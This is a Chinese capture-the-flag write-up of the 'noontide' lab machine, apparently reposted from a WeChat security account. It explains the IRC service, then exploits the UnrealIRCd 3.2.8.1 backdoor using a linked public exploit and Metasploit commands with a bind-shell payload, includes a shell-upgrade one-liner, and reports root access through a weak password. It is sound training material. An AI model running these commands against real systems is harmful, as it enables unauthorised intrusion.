“ IRC服务”
01
—
IRC聊天室
这三个端口我都没有见过,看到服务的名称叫IRC,先了解一下这个服务是干什么的:
IRC(Internet Relay Chat的缩写,“因特网中继聊天”)是一个位于应用层的协议,IRC是一个分布式的客户端/服务器结构。通过连接到一个IRC服务器,我们可以访问这个服务器以及它所连接的其他服务器上的频道。
要使用IRC,必须先登录到一个IRC服务器上,最常见的为irc.freenode.net。
https://freenode.net/ - 最大的IRC网络,为免费和开源软件社区,非营利组织和相关社区提供讨论设施。
https://freenode.net/kb/answer/usermodes - 关于用户模式的Freenode文章
IRC使用的服务器端口有:
6667(明文传输,如irc://irc.freenode.net)、
6697(SSL加密传输,如ircs://irc.freenode.net:6697)等。
对我来说又是新知识,既然是服务器,那么只要找到对应的客户端给登录就好了,这里想着找一下linux端的客户端,但是装了半天都搞不定,找了一下windows端的客户端:mIRC(https://www.mirc.com/get.html)
windows端安装就比较方便了,装好后,看着跟xshell差不多,鼓捣半天才找到更改IP的地方,改好后直接登录:
看到了unreal 3.2.8.1这个信息,查一查EXP,发现有远程命令执行!(https://www.exploit-db.com/exploits/13853)看了一下EXP,是perl的脚本,但是没有使用成功,在github上找到了一个python脚本,改一下IP和反弹端口,使用成功:(https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor/blob/master/exploit.py)
突破边界!
python3
-c
'import pty; pty.spawn("/bin/bash")'
#换个shell
在一顿信息收集之后,用了pspy64跑了一会,中断程序的时候突然把进程给关了,再用上面的脚本打就不行了-0-没办法,用msf吧:
msfconsole
use
exploit/unix/irc/unreal_ircd_3281_backdoor
set
RHOST 靶机IP
set
payload cmd/unix/bind_perl
OK,重新拿到shell!
再查看具有root用户权限的文件,发现了一个日志文件:
看到这个提示,试一试弱密码:
果然是弱密码。。。之前在线的靶机试过root没有试出来(应该是出BUG了),卡了好半天-0-
02 —
总结
这台靶机又让我认识了新的服务,IRC这类型的服务有点类似余网络聊天室,感觉很不错,getshell尝试了2个方法,都能成功,但是MSF的比较稳定,提权部分就比较简单,但是靶机出了BUG那是真头疼
原文始发于微信公众号(重生者安全团队):打靶练习16-noontide
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论